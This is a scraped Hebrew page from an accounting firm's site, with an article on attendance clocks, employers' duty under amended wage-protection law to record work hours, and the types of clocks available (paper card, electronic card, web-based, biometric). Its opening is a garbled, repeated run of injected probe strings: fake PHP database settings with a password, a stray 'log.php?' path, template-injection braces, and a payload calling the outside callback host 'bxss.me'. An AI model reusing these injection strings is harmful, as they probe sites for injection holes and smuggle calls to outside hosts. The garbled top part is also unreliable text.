$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1iHl8CheO"; ?> $db_host = "1"; $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1<tMjBvl<"; ?>acker-9573/log.php?"; ?>{acx}}%>"; ?>"; ?>ass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>'hitylezkgfiwoe392a.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>  רואה חשבון ועוד - שעון נוכחות


רואה חשבון ועוד!

הבית הפיננסי שלך

 רואה חשבון ועוד
חוות דעת מקצועית בענייני ראיית חשבון:
שם מלא
מספר טלפון
פנייה לרואה חשבון >>

שעון נוכחות - רישום יעיל ונוח של שעות העבודה


דרגו אותנו:
| דירוגך () בוצע בהצלחה
 () דירוגים | דירוג ממוצע ()
stars - based on reviews

Hebrew

התיקונים החדשים בחוקי הגנת שכר, אשר נכנסו לתוקפם בפברואר 2009, הדגישו את זכויות העובד וניסו להגן עליו, על ידי הכנסת פרטים חדשים אל תלוש המשכורת שלו. מטרתם של פירוטים אלו, הייתה להפוך את תלוש המשכורת מבליל של נתונים עמומים, למסמך נהיר ופשוט לקריאה.

כחלק מן החוק החדש, חייב המעסיק לעקוב באופן מסודר ומובנה אחר שעות העבודה והנוכחות של כלל עובדיו. כפועל יוצא מכך, מעתה והלאה, אחריותו של כל מעסיק היא לנהל רישום קפדני וברור של שעות העבודה היומיות של כל העובדים החברה.

רישום זה יכול להתבצע בעזרת אמצעי מכני, כגון שעון נוכחות, אך הוא יכול להיות גם ידני ובלבד שיהיה מהימן ומדוקדק. במילים אחרות – חובת המעסיק אינה להתקין שעון נוכחות במקום העבודה, אלא לדאוג לדיווח מסודר ומדויק של שעות העבודה.

למרות שהחזקת שעון נוכחות במקום העבודה איננה בגדר חובה, עדיין רוב רובם המוחץ של העסקים מתקינים שעון כזה בעסק ומשתמשים בו באופן קבוע. הסיבה לכך היא שבעקבות החוק החדש ותיקוניו, רכישה והתקנה של שעון נוכחות בעסק - הופכת להיות משתלמת.

לקריאה נוספת: מהו תפקידו של חשב שכר?

אמנם ניתן לנהל רישום של שעות העבודה ומעקב אחריהן גם באמצעים אחרים, אך אמצעים אלו טומנים בחובם חסרונות רבים. שעון נוכחות, לעומתם, מכיל מגוון יתרונות והופך את כל נושא מעקב השעות לפשוט ונוח במיוחד.

היתרונות בשעון נוכחות

כאמור, למרות שרישום ומעקב אחרי נוכחות עובדים יכול להתבצע באמצעים שונים ומגוונים, רוב בעלי העסקים בוחרים להחזיק שעון נוכחות בחברה שלהם ולהסתמך על מערכת המעקב שהוא מספק.

רישום ידני – מעצם היותו כזה, מכיל מרווח לטעויות. מילוי ידני ויומי של טבלת הנוכחות, בניגוד לשעון נוכחות אוטומטי, מהווה טרחה לא קטנה לעובד. באופן טבעי, אנשים יכולים לשכוח למלא את הטופס בתחילתו ובסופו של כל יום.

שעון נוכחות, מונע מאדם את הצורך לזכור מלכתחילה, מאחר והוא מבצע עבורו את רישום השעות. בנוסף, שלא כמו שעון נוכחות, רישום ידני יכול, במקרים מסוימים, להיהרס, להתלכלך ולהיהפך לבלתי קריא.

רישום ידני, דורש גם מבעל העסק (ולא רק מהעובד עצמו) מעקב וחתימה יומיומיים. לעיתים יכול המעסיק להקצות מיופה כוח מטעמו, אשר יחתום בשבילו על השעות שדווחו, אך גם במקרה הזה מדובר בטרחה, מאחר וגם הוא אינו מבטיח זמינות תמידית ומיידית.

לקריאה נוספת: תיקון לחוק הגנת שכר

ההכרח של בעל עסק או של מנהל משרד לאשר ולחתום על טבלאות נוכחות, נמצא כמעיק ולא יעיל במיוחד. התקנה של מערכת שעון נוכחות במשרד, חוסכת מהמעביד את המעקב והחתימה על טפסי הנוכחות שמילאו עובדיו.

כמו כן, מאחר והמערכת של שעון הנוכחות מחשבת ורושמת באופן יומי את שעות הכניסה והיציאה של העובד, היא מסייעת בעקיפין לחישוב השכר החודשי שלו. שעון הנוכחות מחשב את שעות העבודה של העובד ומזהה גורמים היכולים להשפיע על שכרו, כגון איחורים ושעות נוספות.

למרות הפשטות והיעילות שבהתקנת שעון נוכחות במשרד, ישנם עסקים (במיוחד עסקים קטנים) אשר אינם ממהרים להחזיק מערכת כזו במקום העבודה. לעיתים הסיבה לכך נעוצה בעלות של שעון הנוכחות, אשר יכול להגיע להוצאה של אלפי שקלים.

בנוסף, התקנת השעון מחייבת הזמנה של איש מקצוע, מאחר והיא מצריכה חיבור לרשת תקשורת וחשמל. במקרים מסוימים ההתקנה מביאה עימה בעיות של תשתית ומיקום ודורשת תפעול מסובך.

יחד עם זאת, היתרונות הרבים בשעון נוכחות, והצורך האמיתי בו, גוברים על החסרונות האלו ומביאים בעלי עסק רבים לשלב שעון נוכחות בתוך העסק שלהם.

הסוגים השונים של שעוני נוכחות

כיום, קיימים בשוק סוגים רבים של שעוני נוכחות, וכל מעסיק יכול לבחור מביניהם את השעון המתאים לו ביותר, מבחינת האופי והמחיר.

שעון נוכחות כרטיס נייר – מדובר על שעון נוכחות ותיק מאוד אשר קיים כבר שנים רבות במשק. בשיטה זו, העובד צריך להחתים את כרטיס הנייר שלו בפתיחת כל יום ובסיומו. על אף אמינותה של מערכת זו, היא מחייבת חישוב ידני בתום החודש ולכן עדיין נדרשת בה עבודה רבה.

שעון נוכחות כרטיס אלקטרוני אישי – רבות מן החברות היום משתמשות בשעון נוכחות מהסוג הזה. בעזרת מערכת זו, רישום השעות נעשה באמצעות כרטיס אלקטרוני אישי הניתן לכל עובד בעת כניסתו לתפקיד. מערכת זו מתחברת למחשב ובכך אשר מבצע למעשה את כל חישובי השכר. החיסרון היחידי בשיטה הזו הוא הבלאי של הכרטיסים האלקטרוניים, המצריך את חידושים אחת לתקופה.

שעון נוכחות אינטרנטי – במקרה הזה מדובר על תוכנה הקיימת ברשת ומאפשרת בדיקה של נוכחות העובד. העובד צריך להיכנס אל התוכנה בתחילת כל יום ובאמצעות קוד אישי עליו להקליד את מועדי הכניסה והיציאה שלו מהעבודה.

שעון נוכחות ביומטרי – מערכת זו פועלת על זיהוי העובד על פי טביעת האצבע שלו ולכן היא נחשבת למתקדמת מאוד. היתרון הגדול שלה הוא בדיוק הרב שהיא משיגה ובכך שהיא מונעת לחלוטין אפשרות לזיופים. העובד אינו יכול להיעזר בחבריו, והוא חייב להגיע אל מקום העבודה שלו על מנת לערוך רישום נוכחות.


תאריך: 30/09/2014 11:24
 
close